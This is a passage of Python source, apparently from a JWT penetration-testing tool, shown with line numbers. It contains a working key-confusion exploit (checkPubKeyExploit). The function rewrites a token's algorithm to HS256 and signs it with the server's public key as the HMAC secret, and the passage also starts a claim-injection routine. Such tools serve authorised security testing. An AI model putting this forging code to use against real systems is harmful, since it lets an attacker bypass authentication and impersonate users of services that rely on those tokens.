(headDict, paylB64, pubKey)
| 318 | return [CVEToken0, CVEToken1, CVEToken2, CVEToken3] |
| 319 | |
| 320 | def checkPubKeyExploit(headDict, paylB64, pubKey): |
| 321 | try: |
| 322 | key = open(pubKey).read() |
| 323 | cprintc("File loaded: "+pubKey, "cyan") |
| 324 | except: |
| 325 | cprintc("[-] File not found", "red") |
| 326 | exit(1) |
| 327 | newHead = headDict |
| 328 | newHead["alg"] = "HS256" |
| 329 | newHead = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") |
| 330 | newTok = newHead+"."+paylB64 |
| 331 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newTok.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") |
| 332 | return newTok, newSig |
| 333 | |
| 334 | def injectpayloadclaim(payloadclaim, injectionvalue): |
| 335 | newpaylDict = paylDict |
no test coverage detected